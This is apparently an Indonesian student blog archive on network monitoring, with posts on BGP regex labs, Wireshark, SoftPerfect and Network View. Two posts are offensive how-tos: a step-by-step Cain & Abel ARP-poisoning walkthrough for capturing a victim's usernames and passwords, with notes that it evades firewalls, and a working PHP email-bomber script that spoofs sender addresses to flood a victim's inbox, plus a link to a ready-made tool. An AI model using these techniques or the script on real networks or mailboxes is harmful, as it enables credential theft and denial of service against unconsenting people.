Category: monitoring jarkom


Tujuan lab kali ini yaitu mengenal penggunaan BGP REGEX untu keperluan mencari / memfilter suatu router yang diinginkan.

Caranya dengan menggunakan internet yang memiliki tabel BGP yang sangat banyak.

Petunjuk lab

1. Buku web BGP Looking Glasses

2 . Telnet ke salah satu IP server di BGP Looking Glasses

web

3. Setelah di klik pada salah satu link akan muncul dialog box untuk melakukan telnet

telnet

4. Kita akan dibawa masuk ke server setelah telnet berhasil dilakukan, tampilannya seperti di bawah ini.

masuk server

5. Cek BGP pada server tersebut

sh ip bgp

6. Gunakan regexp untuk menampilkan route yang hanya dari AS 680

regexp 680

7. Gunakan regexp untuk menampikan route yg berasal dari AS 680 serta route lain di belakangnya

regexp 680_

8. Gunakan regexp untuk menampilkan semua route yang berasal dari AS 6461

regexp 6461

9. Gunakan regexp untuk menampilkan route yang berasal dari internal BGP

regexp ^$

10. Gunakan regexp untuk menampilkan route yang melewati AS 4725

regexp _4725_

Iklan

SoftPerfect Network Protocol Analyzer adalah alat profesional gratis untuk menganalisis, debugging, pemeliharaan dan pemantauan jaringan lokal dan koneksi internet. Ia menangkap data melewati koneksi dial-up atau kartu jaringan Ethernet, menganalisis data ini dan kemudian mewakili dalam bentuk yang mudah dibaca. SoftPerfect Network Protocol Analyzer adalah alat yang berguna bagi administrator jaringan, spesialis keamanan, pengembang aplikasi jaringan dan siapa pun yang membutuhkan gambaran yang komprehensif tentang lalu lintas yang melewati koneksi jaringan atau segmen jaringan area lokal.

SoftPerfect Network Protocol Analyzer menyajikan hasil analisis jaringan dalam format yang mudah digunakan dan mudah dimengerti. Hal ini juga memungkinkan Anda untuk defragment dan berkumpul kembali paket jaringan ke sungai. Program ini dapat dengan mudah menganalisa lalu lintas jaringan berdasarkan sejumlah protokol internet yang berbeda seperti yang tercantum di bawah ini.

SoftPerfect Network Protocol Analyzer fitur decoding penuh dari protokol tingkat rendah berikut: AH, ARP, ESP, ICMP, ICMPv6, IGMP, IP, IPv6, IPX, LLC, MSG, REVARP, RIP, SAP, SER, SNAP, SPX, TCP dan UDP. Hal ini juga melakukan rekonstruksi penuh tingkat atas protokol seperti HTTP, SMTP, POP, IMAP, FTP, TELNET dan lain-lain.

Sistem fleksibel bisa diatur filter dapat digunakan untuk membuang semua lalu lintas jaringan kecuali pola lalu lintas tertentu Anda ingin menganalisis. SoftPerfect Network Protocol Analyzer juga dilengkapi pembangun paket. Alat ini memungkinkan Anda untuk membangun paket Anda sendiri jaringan kustom dan mengirim mereka ke jaringan. Anda bisa menggunakan fitur pembangun paket untuk memeriksa jaringan Anda untuk perlindungan terhadap serangan dan penyusup.

Perangkat lunak ini memerlukan Windows 2000/XP/2003/Vista/2008/Seven. Kedua sistem 32-bit dan 64-bit yang didukung. Hal ini juga memerlukan sambungan jaringan, yang bisa menjadi koneksi nirkabel, atau modem yang sesuai dengan standar NDIS.

Fitur Utama

  • Mampu menangkap semua paket jaringan.
  • Menkonversi paket dan menampilkannya dalam format yang mudah dibaca.
  • Memungkinkan Anda membangun kustom paket dan mengirim mereka ke jaringan.
  • Menawarkan sistem lalu lintas yang fleksibel dalam penyaringan. Filter apapun dapat menjadi inklusif atau eksklusif.
  • Merekonstruksi paket ke jaringan sehingga Anda dapat dengan mudah melihat pertukaran data lengkap Telnet, POP3, SMTP, IMAP, FTP, HTTP dan protokol lainnya.
  • Memungkinkan Anda memonitor koneksi loopback dalam sistem.

Pengen coba softwarenya?? Silahkan DOWNLOAD DISINI

Tutorial

1. Cara penggunaannya sama dengan tools Monitoring lain, dengan cara memilih interface dan kemudian klik start capture.

akan muncul paket – paket data yang lewat, ada MAC, Frame, Protocol, IP source dan destination, dll.

2. Keunggulan dari tools ini adalah kita dapat memonitor traffic flow analysis.

3. Kita juga melihat aktivitas yang sedang dilakukan oleh host

4. Software ini juga memiliki kemampuan untuk melihat apa saya protokol yang digunakan oleh host dan seberapa besar jumlahnya.

ketika melakukan ping terlihat bahwa paket ICMP akan berubah.

Referensi

http://www.softperfect.com/products/networksniffer/

Untuk format PDF bisa di download disini network protocol analyzer

Pada jaringann komputer banyak jenis – jenis packet data yang ada, masing – masing mempunyai fungsi yang berbeda dan saling berkaitan. Sebuah paket berisi packet header yang berisi informasi mengenai protokol tersebut (informasi mengenai jenis, sumber, tujuan, atau informasi lainnya), data yang hendak ditransmisikan yang disebut dengan data payload, dan packet trailer yang bersifat opsional. Sebuah paket memiliki struktur logis yang dibentuk oleh protokol yang digunakannya. Ukuran setiap paket juga dapat bervariasi, tergantung struktur yang dibentuk oleh arsitektur jaringan yang digunakan.

Contoh macam – macam packet tersebut adalah.

ARP,
ICMP,
DHCP,
DNS,
IP,
TCP,
UDP,
HTTP,
FTP,
SMTP,
POP,
IMAP,
WLAN (IEEE 802.11), dan
TLS/SSL

Software monitoring jaringan Wireshark mendukung untuk mengcapture semua packet data jaringan tersebut.

Untuk mengetahui lebih lengkap mengenai definisi, fungsi dan contoh hasil capture packet data menggunakan wireshark dapat dilihat pada link berikut ini.Packet Data

Slideshow ini membutuhkan JavaScript.

Pada postingan sebelumnya saya sudah membahas tentang apa itu sniffing, tujuan dan fungsinya. Sekarang saya akan mencoba sedikit iseng menggunaka sniffing untuk melihat username dan password dari host yang terkoneksi dengan jaringan kita, hehe.

Bisa dilakukan dengan berbagai macam software, misal wireshark atau chain & abel. Namun kali ini saya akan menggunakan software chain & abel.

Pertama unduh dah install softwarenya disini

Cain & Abel merupakan software yang dapat digunakan untuk melakukan hacking via interface LAN & wireless. Untuk menggunakannya kita hanya perlu mengetahui jenis interface yang terkoneksi dengan jaringan, IP address dan IP server.

Berikut ini tampilan awal software chain & abel.

1. Pilih tab configure untuk memilih interface yang terhubung ke jaringan, bisa LAN / wireless adapter.

2. Masuk ke tab sniffer, pilih interface, kemudian klik apply, lalu OK.

3. Masuk ke tab sniffer, lalu klik tombol icon start sniffer.

4. Selanjutnya klik icon “+” untuk menambah list dari host.

5. Tentukan target yang akan kita sniffing, bisa semua range dalam jaringan kita atau IP tertentu saja. Jika kita ingin menggunakan paket ARP test, check semua Promiscuous Mode Scanner. Lalu klik OK.

6. Proses scan dari IP range yang telah kita tentukan sebelumnya sedang berlangsung.

7. List host yang terkoneksi dengan jaringan kita.

8. Langkah berikutnya masuk ke tab APR.

9. Klik icon “+” untuk menambahkan list korban yang ingin kita sniffing.

10. Status awal dari host adalah idle.

11.Klik icon berwarna kunik, untuk memulai proses APR. Dapat kita lihat status host telah berubah menjadi poisoning.

12. Status poisoning menandakan bahwa paket – paket yang lewat pada host dapat kita pantau, baik paket yang masuk atau keluar.

13. Langkah terakhir kita pilih tab password yang ada di bawah, untuk melihat username dan password yang diakses oleh si korban.

Silahkan dicoba teman2, buat iseng2 aja ya. Jangan dibuat untuk kejahatan. 😀

http://ijhoonk-childs.blogspot.com/2012/03/sniffing-tools-hacker-lan-or-wifi.html

Tujuan dilakukan sniffing
1. Troubleshooting
2. Keamanan
3. Monitor jaringan / network analyzer
4. Cracking (menjebol sistem)
5. Maintenance (pemeliharaan jaringan)

Sniffer adalah sebuah device penyadapan komunikasi jaringan komputer dengan memanfaatkan mode premicious pada ethernet.
Karena jaringan komunikasi komputer terdiri dari data biner acak maka sniffer ini biasanya memiliki penganalisis protokol sehingga data biner acak dapat dipecahkan.
Fungsi sniffer bagi pengelola bisa untuk pemeliharaan jaringan, bagi orang luar bisa untuk menjebol sistem.
Cara paling mudah untuk mengantisipasi Sniffer adalah menggunakan aplikasi yang secure, misal : ssh, ssl, secureftp dan lain-lain

Kontrol terhadap Teknik Sniffing
Ada kemungkinan bahwa seseorang yang tak berhak terhadap suatu informasi berhasil membaca informasi tersebut melalui jaringan (dengan menggunakan teknik sniffer).
Untuk mengantisipasi keadaan seperti ini, alangkah lebih baik sekiranya informasi tersebut dikodekan dalam bentuk yang hanya bisa dibaca oleh yang berhak.
Studi tentang cara mengubah suatu informasi ke dalam bentuk yang tak dapat dibaca oleh orang lain dikenal dengan istilah kriptografi.
Adapun sistemnya disebut sistem kripto. Secara lebih khusus, proses untuk mengubah teks asli (cleartext atau plaintext) menjadi teks yang telah dilacak (cliphertext) dinamakan enskripsi, sedangkan proses kebalikannya, dari chiphertext menjadi cleratext, disebut dekrpisi. Ini kembali lagi ke masalah Enkripsi dan Dekripsi.

Contoh Penggunaan Teknik Sniffing
Tutorial Cracking via Jaringan LAN
Ini mungkin bukan teknik yang baru didunia cracking.

Pertama-tama pahami dulu perbedaan jaringan Hub dan Switch

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Untuk cracking/hacking kali ini kita pakai teknik sniffing dan ARP poison route. Kedua teknik ini gak bisa ditangkal oleh firewall.

Note => ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda.

Kelebihan:
* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:
* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

http://www.i-bego.com/keamanan-komputer/sniffing-t524.html

Berikut ini beberapa software yang dapat digunakan untuk melakukan sniffing      

Email bomber merupakan software atau tool yang digunakan untuk mengirim email secara terus menerus ke suatu email tujuan, dengan jumlah email yang ditentukan bisa 10, 100, 1000, bahkan tak terbatas (unlimited). Atau juga bisa sedikit email yang dikirim, namun tiap email memiliki file attactment yang ukurannya besar. Dan sudah pasti, email sampah yang anda kirimkan akan memenuhi Inbox orang tersebut yang pada akhirnya Space/Bandhwith emailnya akan kepenuhan dan akhirnya error.

Kenapa Email Bomb bisa merusak email..?
Didalam dunia email kata Email Bomb dan Spam hampir ada kesamaan maksud dan tujuan, tetapi spam lebih menekankan pengiriman email berlebihan dan mengandung virus, tapi kedua istilah Email Bomb dan Spam mempunyai tujuan yang sama yaitu mengirim email tidak bermanfaat dengan jumlah banyak.
Email korban ada kemungkinan bisa rusak alias tidak dapat di gunakan lagi, dengan dua alasan :
1. Pertama ketika email korban dipenuhi dengan beribu email sehingga melampaui batas akibatnya Internet Service Provider (ISP) tidak dapat melanjutkan layanan, karna jumlah email yang di terima terlalu banyak  maka mail server ISP mengalami Crash/down yang berdampak tidak dapat melakukan penerimaan email atau pengiriman email.
2. Kedua apabila Email Bomb yang dikirimkan dibaca Email Spam maka akan mengalami flooding artinya emailbox account kita dibanjiri dengan email yang sama sehingga jumlahnya melampaui kuota alokasi emailbox yang disediakan. Akibatnya email-email penting tidak dapat masuk atau bahkan bisa menyebabkan hilangnya email-email penting, yang juga dapat mengakibatkan DOS (denial of service) pada mail server (yaitu keadaan di mana server tidak memberikan respon ketika diberi perintah kepadanya). Untuk mengatasinya maka Anda perlu memberi semacam filter pada email client Anda misal seperti pada Outlook Express sehingga kiriman alamat email tertentu yang telah kita spesifikasikan terlebih dahulu, akan langsung dihapus

Kita bisa membuat email bomber ini sendiri menggunakan script berikut ini.

http://art-of-hacks.cyber4rt.com/2012/07/script-email-bomber.html

Berikut contoh potongan programnya:
<html>
<body>
<form method=post action=index.php>
<pre>
<input type=hidden value=ok name=ok>
Dari : <input name=dari value=”<? echo $dari;?>”>
Kepada : <input name=kepada value=”<? echo $kepada;?>”>
Jumlah : <input name=jumlah value=”<? echo $jumlah;?>”>
Isi Pesan: <textarea name=isi><?echo $isi?></textarea><br>
<input type=submit value=Booom>
</form></pre>
<?
if ($ok==”ok”)
{
for ($i=0;$i<$jumlah;$i++)
{
$a=$i.$dari;
mail($kepada,$isi,””,”From : $a <$a>”);
}
echo (“Beres Bos”);
}
?>
</body>
</html>
Lalu simpan code tersebut dalam sebuah file, misalkan email-bomber.php
Selanjutnya masukkan file tersebut dalam webserver atau webhosting kamu.
Langkah berikutnya buka browser lalu masukkan alamat dimana kamu menyimpan file tersebut misalkan http://namadomainkamu.com/email-bomber.php
Jika alamat e-mail yang ditujukan benar maka akan secara otomatis mengirimkan pesan ke email korban.

Atau jika anda tidak mau ribet, silahkan download software yang sudah jadi di bawah ini.

download

mediafire        password  http://www.javacreativity.com

Adapun cara memakainya sebagai berikut :
 1. Masukkan smtp sever dari email yang digunakan untuk mengirim, list smtp server
2. Masukkan username dan password dari email yang digunakan untuk mengirim. Pastikan akun tidak terproteksi dengan verifikasi nomor telepon, karena software tidak dapat bekerja.
3. Isikan email tujuan, judul pesan, isi pesan dan jumlah email yang akan kita kiri. Setelah terisi semua kemudian klik Mulai.
4. Berikut hasil capture paket menggunakan wireshark ketika software bekerja. Terlihat banyak paker smtp yang lewat, ini menandakan proses pengiriman email secara berulang kali.
Silahkan dicoba di email masing2. Tolong pergunakan software ini dengan bijak, ingat ALLAH maha tau kawan2. hehehe.

Fitur Fitur Terbaru dari Wireshark

1.Dalam inspeksi dari ratusan protokol, akan ditambahkan dengan lebih setiap saat
2.Tinggal menangkap dan analisis offline
3.Standar dengan tiga panel paket Browser
4.Multi-platform: Berjalan pada Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, dan banyak lainnya 5.Jaringan data yang diambil dapat diakses melalui GUI, atau melalui utilitas TShark TTY-mode
6.Filter layar paling kuat di industri
7.Kaya VoIP analisis
8.Membaca / menulis format file menangkap banyak berbeda
9.Ambil file yang dikompresi dengan gzip dapat didekompresi dengan cepat Data hidup dapat dibaca dari Ethernet, IEEE 802.11, PPP / HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, dan lain-lain (tergantung pada platfrom Anda)
10.Dekripsi dukungan untuk protokol, termasuk IPsec, ISAKMP, Kerberos, SNMPv3, SSL / TLS, WEP, dan WPA/WPA2
11.Mewarnai aturan dapat diterapkan ke daftar paket untuk cepat, analisis intuitif
12.Output dapat diekspor ke XML, PostScript ®, CSV, atau teks biasa

http://www.cybercnesoftware.com/2012/04/wireshark-167-32-bit.html

Cara menggunakan wireshark secara sederhana.

Tampilan awal wireshark

.

Menu2 wireshark untuk memulai proses capture. Pilih interface yang terkoneksi dengan jaringan, bisa dilihat dari packet yang berubah2. Pada gambar di bawah interface kedua yang terhubung ke jaringan. Klik start untuk memulai proses capture data.

Setelah start akan muncul gambar sebagai berikut, ini mengindikasikan bahwa wireshark telah bekerja daan paket – paket data yang lewat di jaringan kita telah tampak.
Gambar diatas menunjukkan paket2 yang lewat pada jaringan kita, tiap warna mempunyai identitas untuk protokol yang lewat. Hijau untuk http, merah tcp, abu – abu arp, dll.

Untuk menghentikan proses capture, klik icon dibawah ini.

 Setelah proses berhenti, kita bisa menyimpan hasil capture dengan mengklik icon disket seperti dibawah ini.

Simpan file dengan format yang kita butuhkan, wireshark mendukung berbagai macam save format seperti dibawah ini.Pilih directory untuk menyimpan file, lalu klik save.

Cukup jelas kawan2?? Gampang kan?? Semoga bermanfaat..

Untuk lebih jelas mengenai cara instalasi dan download softwarenya klik link dibawah ini

Wireshark merupakan aplikasi perangkat lunak (software) yang digunakan untuk melihat, mengcapture dan menganalisa paket – paket data yang lewat pada jaringan kita. Sangat mudah dipakai karena meggunakan GUI dan merupakan freeware (software gratis). Sering digunakan oleh analisis jaringan komputer, untuk menganalisa protokol seperti SNMP, ARP, ICMP, HTTP. Apabila terjadi kelambatan dalam jaringan komputer, misal proses transfer file yang lambat antar host, aplikasi yang lambat dalam mengirimkan data, dll. Kita dapat mengcapture paket – paket data yang lewat untuk kemudian di analisa dan menemukan penyebab kelambatan, seperti broadcast storming.

Berikut cara instalasi dan penggunaan wireshark.

  1. Double clik file instalasai, akan muncul dialog box seperti berikut. Kemudian klik next.
  2. Akan muncul license agreement lalu klik “I agree”.
  3. Pilih komponen yang akan di install, pilih semua lalu klik next.
  4. Pilih additional tasks, yang wajib diisi adalah file extension. Kemudian klik next.
  5. Pilih di folder mana wireshark akan diinstall, klik next.
  6. Diperlukan install wincap untuk dapat mengcapture network data yang lewat. Pilih install.
  7. Wireshark sedang melakukan proses instalasi.
  8. Instalasi wireshark selesai, lalu klik next.
  9. Apabila anda ingin menjalankan wireshark, centang “run wire shark”. Klik finish.
  10. Akan muncul dialog box instalasi wincap, klik next.
  11. Pilih next untuk memulai instalasi wincap.
  12. Tampil license agreement wincap, lalu pilih “i agree”
  13. Centang “automatically start….” untuk menjalankan wincap secara otomatis saat PC di reboot. Klik install.
  14. Instalasi wincap selesai, klik finish.

Berminat untuk mencobanya saudara2?? Silahkan download langsung softwarenya disini 😀

Pgn tahu cara pengunaan dan fitur2nya?? Cek this out

Dalam postingan sebelumnya udah dibahas mengenai cara instalasi dan penggunaan awal network view, pada kesempatan kali ini ane bakal bahas mengenai fitur – fitur yang dimiliki oleh network view.

Selain bisa untuk mengetahui siapa saja yang terkoneksi dengan jaringan kita, software ini juga memiliki fitur – fitur lain. Yaitu.

1. VNC (Virtual Network Computing)

Merupakan software yang digunakan untuk meremote komputer lain. Kita dapat berinteraksi dan berkomunikasi dengan komputer lain melalui jaringan, sehingga kita dapat mengendalikan suatu komputer dari jarak jauh melalui komputer lain.

2. Netmeeting

adalah perangkat lunak (software) yang dimiliki oleh windows, bisa digunakan untuk chatting, call, share program, whiteboard, transfer files.

3. Telnet (Telecommunication Network)

protokol jaringan yang digunakan di internet atau jaringan lokal, menyediakan komunikasi dua arah berbasis teks atau terminal emulator antara client dan server. Dengan kata lain, Telnet memungkinkan kita untuk mengendalikan, memberi perintah, menjalankan perintah, merubah konfigurasi, meremote komputer lain (server) melalui komputer di depan meja kita sendiri (client). http://alweecomputer.com/2012/06/02/sekilas-tentang-telnet.html

4. FTP (File Transfer Protokol)

adalah suatu protokol yang berfungsi untuk tukar-menukar file dalam suatu network yang mensupport TCP/IP protokol. Dua hal penting yang ada dalam FTP adalah FTP server dan FTP Client. FTP server menjalankan software yang digunakan untuk tukar menukar file, yang selalu siap memberian layanan FTP apabila mendapat request dari FTP client. FTP client adalah komputer yang merequest koneksi ke FTP server untuk tujuan tukar menukar file (mengupload atau mendownload file). http://aminudin.net/ftp-server/

5. PING

adalah sebuah protokol yang digunakan untuk mengecek apakah suatu alamat tersebut sudah terkoneksi ke jaringan. Apabila sudah terkoneksi akan muncul kata “reply” dan apabila muncul kata “request time out” atau “destination host unreachable” itu artinya belum terjadi koneksi antara komputer kita dengan alamat tujuan. Paket yang dikirim akan adalah ICMP (Internet Control Message Protocol).

6. MIB Browser (Management Information Base)

Tool yang digunakan untuk mengatur device jaringan SNMP yang tersedia, memberikan kemudahan untuk mengeluarkan permintaan MIB untuk mendapatakan data agen atau membuat perubahan pada agen yang bersangkutan.

7. WMI Browser (Windows Management Instrumentation)

sistem operasi Microsoft Windows. WMI bukan hanya sebuah komponen tapi merupakan teknologi inti dan standar untuk pengelolaan Windows. WMI menjadi dasar dalam pemantauan dan pengontrolan yang konsisten dan seragam dalam pengelolaan sistem secara keseluruhan di dalam lingkungan Windows. WMI memungkinkan administrator sistem untuk menarik data, merubah dan memantau konfigurasi pada desktop dan server, aplikasi-aplikasi, jaringan dan komponen-komponen lainnya. Pada penerapannya, seorang programer dapat membuat sebuah program aplikasi dengan memanfaatkan WMI Scripting Library untuk bekerja dengan objek-objek WMI guna membuat berbagai perangkat manajemen dan monitor sistem. http://www.tobuku.com/docs/MAI01-Mengenal%20Windows%20Management%20Instrumentation.pdf

Nah itu tadi fitur – fitur yang disediakan oleh Network View, silahkan dicoba sendiri gan biar lebih mantep dan jelas 😀

Network view adalah salah satu dari sekian banyak software yang digunakan untuk monitoring jaringan komputer, dapat melihat komputer mana saja yang terkoneksi dengan jaringan kita.


Dapat menampilkan mana saja host yang akrif dalam bentuk gambar visual seperti topologi jaringan, bisa berupa server, webcam, AP, workstation, terminal, UPS, switch, linux / unix, SNMP device.
Network view menyediakan beberapa fasilitas diantaranya View info, Modify, Edit note, MIB Browser, WMI Browser, Internet Browser, Port Scanner, Ping, Ftp, Telnet, VNC, Terminal Service dan NetMeeting.

Berminat coba gan? silahkan download dimari

Selanjutnya ane akan melakukan instalasi software network view, gampang kok tinggal di next2 aja seperti biasa.

  1. Double klik file instalasi, akan muncul dialog box seperti dibawah. Klik next.
  2. Muncul license agrement, pilih “accept”. Lalu klik next.
  3. Tampak information mengenai network view, untuk melanjutkan instalasi klik next.
  4. Pilih dimana software akan diinstal, kemudian klik next.
  5. Software akan membuat shortcut pada folder start menu, kemudian klik next.
  6. Network view siap diinstal, klik install untuk melakukan proses instalasi.
  7. Akan muncul pemberitahuan bahwa software yang digunakan trial, klik next untuk menyelesaikan instalasi.
  8. Software instlasi telah berhasil diinstal, klik finish.
  9. Tampilan awal software network view.
  10. Klik icon network view yang ada di pojok kiri atas (new), lalu akan muncul dialog box seperti dibawah ini. Masukkan title, description, author, dari jaringan yang akan kita tinjau. Isikan type discover, sebagai contoh kita discover berdasarkan range.
  11. Software mulai melakukan scan pada network range yang kita pilih, mulai dari scan DNS, netbios, SNMP, port, dll.
  12. Setelah selesai melakukan scan, akan muncul network yang berada pada jaringan kita. Seperti gambar dibawah ini.

Nah itu tadi sedikit gambaran dan instalasi tentang software Network View, cara penggunaan dan fitur2nya. Semoga bermanfaat, terima kasih.